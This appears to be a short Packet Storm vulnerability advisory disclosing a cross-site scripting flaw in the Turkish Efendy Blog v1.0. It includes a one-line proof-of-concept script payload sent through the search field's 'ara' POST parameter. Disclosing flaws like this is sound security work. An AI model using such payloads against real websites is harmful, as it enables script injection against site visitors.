Efendy Blog version 1.0 suffers from a cross site scripting vulnerability.
18888fed0ba6b4c19e9c2015ce24c9350e603f8c9f1011b977ea77af72946d4ei found a bug on Efendy Blog v1.0 (tr) XSS Vulnerability.
i want to publish it on your site.
Efendy Blog v1.0 (tr) XSS Vulnerability
#Software: Efendy Blog v1.0 (tr)
#download: http://www.aspindir.com/goster/4989
#demo: http://www.webixir.com/
#Found By: GeFORC3 ( G3 )
#Example & Exploit :
You write xss code in Efendy Blog v1.0 script's search (ara)
exp: "><script>alert("G3");</script>
Press to "ara"(search) button.
This xss works on Efendy Blog v1.0 script's main page
-----------------------------------------------------
The POST variable "ara" has been set to "><script>alert("G3");</script>
(example xss code)
-----------------------------------------------------
WwW.GeFORC3.Org | WwW.HeykirBlog.Com | WwW.NetKaBus.Com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed